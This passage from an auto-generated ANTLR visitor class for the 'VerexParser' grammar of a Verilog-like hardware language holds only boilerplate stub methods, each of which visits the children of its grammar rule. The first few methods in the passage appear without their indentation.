# Visit a parse tree produced by VerexParser#stat_else.
def visitStat_else(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_conditional_statement.
def visitFunction_conditional_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#funct_stat_if.
def visitFunct_stat_if(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#funct_stat_elseif.
def visitFunct_stat_elseif(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#funct_stat_else.
def visitFunct_stat_else(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#arrayed_identifier.
def visitArrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#regex_arrayed_identifier.
def visitRegex_arrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#identifier.
def visitIdentifier(self, ctx):
return self.visitChildren(ctx)
    # Visit a parse tree produced by VerexParser#list_of_parameter_assignments.
    def visitList_of_parameter_assignments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#equal_parameter_assignment.
    def visitEqual_parameter_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_instance.
    def visitModule_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#special_port_connection.
    def visitSpecial_port_connection(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#comma_special_port_connection.
    def visitComma_special_port_connection(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_port_connections.
    def visitList_of_port_connections(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#mixed_port_connection.
    def visitMixed_port_connection(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#comma_mixed_port_connection.
    def visitComma_mixed_port_connection(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#port_connection_expression.
    def visitPort_connection_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#range_.
    def visitRange_(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#range_expression.
    def visitRange_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#dimension.
    def visitDimension(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#text_macro_definition.
    def visitText_macro_definition(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#text_macro_name.
    def visitText_macro_name(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_formal_arguments.
    def visitList_of_formal_arguments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#text_macro_identifier.
    def visitText_macro_identifier(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#formal_argument_identifier.
    def visitFormal_argument_identifier(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#macro_text.
    def visitMacro_text(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#text_macro_usage.
    def visitText_macro_usage(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#config_declaration.
    def visitConfig_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#design_statement.
    def visitDesign_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#config_rule_statement.
    def visitConfig_rule_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#default_clause.
    def visitDefault_clause(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#inst_clause.
    def visitInst_clause(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#inst_name.
    def visitInst_name(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#liblist_clause.
    def visitLiblist_clause(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#cell_clause.
    def visitCell_clause(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#use_clause.
    def visitUse_clause(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#source_text.
    def visitSource_text(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_keyword.
    def visitModule_keyword(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_parameter_port_list.
    def visitModule_parameter_port_list(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_ports.
    def visitList_of_ports(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_port_declarations.
    def visitList_of_port_declarations(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#port_expression.
    def visitPort_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_item.
    def visitModule_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_or_generate_item.
    def visitModule_or_generate_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#non_port_module_item.
    def visitNon_port_module_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_or_generate_item_declaration.
    def visitModule_or_generate_item_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#parameter_override.
    def visitParameter_override(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#parameter_declaration.
    def visitParameter_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#specparam_declaration.
    def visitSpecparam_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#inout_declaration.
    def visitInout_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#input_declaration.
    def visitInput_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#output_declaration.
    def visitOutput_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#event_declaration.
    def visitEvent_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#genvar_declaration.
    def visitGenvar_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#time_declaration.
    def visitTime_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#real_declaration.
    def visitReal_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#realtime_declaration.
    def visitRealtime_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#reg_declaration.
    def visitReg_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#net_type.
    def visitNet_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#output_variable_type.
    def visitOutput_variable_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#real_type.
    def visitReal_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#variable_type.
    def visitVariable_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#drive_strength.
    def visitDrive_strength(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#strength0.
    def visitStrength0(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#strength1.
    def visitStrength1(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#charge_strength.
    def visitCharge_strength(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delay3.
    def visitDelay3(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delay2.
    def visitDelay2(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delay_value.
    def visitDelay_value(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_event_identifiers.
    def visitList_of_event_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_genvar_identifiers.
    def visitList_of_genvar_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_port_identifiers.
    def visitList_of_port_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_net_decl_assignments.
    def visitList_of_net_decl_assignments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_param_assignments.
    def visitList_of_param_assignments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_specparam_assignments.
    def visitList_of_specparam_assignments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_real_identifiers.
    def visitList_of_real_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_variable_identifiers.
    def visitList_of_variable_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_variable_port_identifiers.
    def visitList_of_variable_port_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#net_decl_assignment.
    def visitNet_decl_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#param_assignment.
    def visitParam_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#specparam_assignment.
    def visitSpecparam_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pulse_control_specparam.
    def visitPulse_control_specparam(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#error_limit_value.
    def visitError_limit_value(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#reject_limit_value.
    def visitReject_limit_value(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#limit_value.
    def visitLimit_value(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_declaration.
    def visitFunction_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_item_declaration.
    def visitFunction_item_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_port_list.
    def visitFunction_port_list(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_port.
    def visitFunction_port(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#range_or_type.
    def visitRange_or_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#task_declaration.
    def visitTask_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#task_item_declaration.
    def visitTask_item_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#task_port_list.
    def visitTask_port_list(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#task_port_item.
    def visitTask_port_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tf_decl_header.
    def visitTf_decl_header(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tf_declaration.
    def visitTf_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#task_port_type.
    def visitTask_port_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#block_item_declaration.
    def visitBlock_item_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#block_reg_declaration.
    def visitBlock_reg_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_block_variable_identifiers.
    def visitList_of_block_variable_identifiers(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#block_variable_type.
    def visitBlock_variable_type(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#gate_instantiation.
    def visitGate_instantiation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#cmos_switch_instance.
    def visitCmos_switch_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#enable_gate_instance.
    def visitEnable_gate_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#mos_switch_instance.
    def visitMos_switch_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#n_input_gate_instance.
    def visitN_input_gate_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#n_output_gate_instance.
    def visitN_output_gate_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pass_switch_instance.
    def visitPass_switch_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pass_enable_switch_instance.
    def visitPass_enable_switch_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pull_gate_instance.
    def visitPull_gate_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#name_of_gate_instance.
    def visitName_of_gate_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pulldown_strength.
    def visitPulldown_strength(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pullup_strength.
    def visitPullup_strength(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#enable_terminal.
    def visitEnable_terminal(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#ncontrol_terminal.
    def visitNcontrol_terminal(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pcontrol_terminal.
    def visitPcontrol_terminal(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#input_terminal.
    def visitInput_terminal(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#inout_terminal.
    def visitInout_terminal(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#output_terminal.
    def visitOutput_terminal(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#cmos_switchtype.
    def visitCmos_switchtype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#enable_gatetype.
    def visitEnable_gatetype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#mos_switchtype.
    def visitMos_switchtype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#n_input_gatetype.
    def visitN_input_gatetype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#n_output_gatetype.
    def visitN_output_gatetype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pass_en_switchtype.
    def visitPass_en_switchtype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pass_switchtype.
    def visitPass_switchtype(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_instantiation.
    def visitModule_instantiation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#parameter_value_assignment.
    def visitParameter_value_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#ordered_parameter_assignment.
    def visitOrdered_parameter_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#named_parameter_assignment.
    def visitNamed_parameter_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#name_of_instance.
    def visitName_of_instance(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#ordered_port_connection.
    def visitOrdered_port_connection(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#named_port_connection.
    def visitNamed_port_connection(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generated_instantiation.
    def visitGenerated_instantiation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generate_item_or_null.
    def visitGenerate_item_or_null(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generate_item.
    def visitGenerate_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generate_conditional_statement.
    def visitGenerate_conditional_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generate_case_statement.
    def visitGenerate_case_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#genvar_case_item.
    def visitGenvar_case_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generate_loop_statement.
    def visitGenerate_loop_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#genvar_assignment.
    def visitGenvar_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#generate_block.
    def visitGenerate_block(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#continuous_assign.
    def visitContinuous_assign(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_net_assignments.
    def visitList_of_net_assignments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#net_assignment.
    def visitNet_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#initial_construct.
    def visitInitial_construct(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#always_construct.
    def visitAlways_construct(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#blocking_assignment.
    def visitBlocking_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#nonblocking_assignment.
    def visitNonblocking_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#procedural_continuous_assignments.
    def visitProcedural_continuous_assignments(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_blocking_assignment.
    def visitFunction_blocking_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_statement_or_null.
    def visitFunction_statement_or_null(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_seq_block.
    def visitFunction_seq_block(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#variable_assignment.
    def visitVariable_assignment(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#par_block.
    def visitPar_block(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#seq_block.
    def visitSeq_block(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#statement.
    def visitStatement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#statement_or_null.
    def visitStatement_or_null(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_statement.
    def visitFunction_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delay_or_event_control.
    def visitDelay_or_event_control(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delay_control.
    def visitDelay_control(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#disable_statement.
    def visitDisable_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#event_control.
    def visitEvent_control(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#event_trigger.
    def visitEvent_trigger(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#event_expression.
    def visitEvent_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#event_primary.
    def visitEvent_primary(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#procedural_timing_control_statement.
    def visitProcedural_timing_control_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#wait_statement.
    def visitWait_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#if_else_if_statement.
    def visitIf_else_if_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_if_else_if_statement.
    def visitFunction_if_else_if_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#case_statement.
    def visitCase_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#case_item.
    def visitCase_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_case_statement.
    def visitFunction_case_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_case_item.
    def visitFunction_case_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#function_loop_statement.
    def visitFunction_loop_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#loop_statement.
    def visitLoop_statement(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#system_task_enable.
    def visitSystem_task_enable(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#task_enable.
    def visitTask_enable(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#specify_block.
    def visitSpecify_block(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#specify_item.
    def visitSpecify_item(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#pulsestyle_declaration.
    def visitPulsestyle_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#showcancelled_declaration.
    def visitShowcancelled_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#path_declaration.
    def visitPath_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#simple_path_declaration.
    def visitSimple_path_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#parallel_path_description.
    def visitParallel_path_description(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#full_path_description.
    def visitFull_path_description(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_path_inputs.
    def visitList_of_path_inputs(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_path_outputs.
    def visitList_of_path_outputs(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#specify_input_terminal_descriptor.
    def visitSpecify_input_terminal_descriptor(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#specify_output_terminal_descriptor.
    def visitSpecify_output_terminal_descriptor(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#input_identifier.
    def visitInput_identifier(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#output_identifier.
    def visitOutput_identifier(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#path_delay_value.
    def visitPath_delay_value(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#list_of_path_delay_expressions.
    def visitList_of_path_delay_expressions(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t_path_delay_expression.
    def visitT_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#trise_path_delay_expression.
    def visitTrise_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tfall_path_delay_expression.
    def visitTfall_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tz_path_delay_expression.
    def visitTz_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t01_path_delay_expression.
    def visitT01_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t10_path_delay_expression.
    def visitT10_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t0z_path_delay_expression.
    def visitT0z_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tz1_path_delay_expression.
    def visitTz1_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t1z_path_delay_expression.
    def visitT1z_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tz0_path_delay_expression.
    def visitTz0_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t0x_path_delay_expression.
    def visitT0x_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tx1_path_delay_expression.
    def visitTx1_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#t1x_path_delay_expression.
    def visitT1x_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tx0_path_delay_expression.
    def visitTx0_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#txz_path_delay_expression.
    def visitTxz_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#tzx_path_delay_expression.
    def visitTzx_path_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#path_delay_expression.
    def visitPath_delay_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#edge_sensitive_path_declaration.
    def visitEdge_sensitive_path_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#parallel_edge_sensitive_path_description.
    def visitParallel_edge_sensitive_path_description(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#full_edge_sensitive_path_description.
    def visitFull_edge_sensitive_path_description(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#data_source_expression.
    def visitData_source_expression(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#edge_identifier.
    def visitEdge_identifier(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#state_dependent_path_declaration.
    def visitState_dependent_path_declaration(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#polarity_operator.
    def visitPolarity_operator(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#checktime_condition.
    def visitChecktime_condition(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delayed_data.
    def visitDelayed_data(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#delayed_reference.
    def visitDelayed_reference(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#end_edge_offset.
    def visitEnd_edge_offset(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#event_based_flag.
    def visitEvent_based_flag(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#notify_reg.
    def visitNotify_reg(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#remain_active_flag.
    def visitRemain_active_flag(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#stamptime_condition.
    def visitStamptime_condition(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#start_edge_offset.
    def visitStart_edge_offset(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#threshold.
    def visitThreshold(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#timing_check_limit.
    def visitTiming_check_limit(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#concatenation.
    def visitConcatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_concatenation.
    def visitConstant_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_multiple_concatenation.
    def visitConstant_multiple_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_path_concatenation.
    def visitModule_path_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#module_path_multiple_concatenation.
    def visitModule_path_multiple_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#multiple_concatenation.
    def visitMultiple_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#net_concatenation.
    def visitNet_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#variable_concatenation.
    def visitVariable_concatenation(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#variable_concatenation_value.
    def visitVariable_concatenation_value(self, ctx):
        return self.visitChildren(ctx)

    # Visit a parse tree produced by VerexParser#constant_function_call.
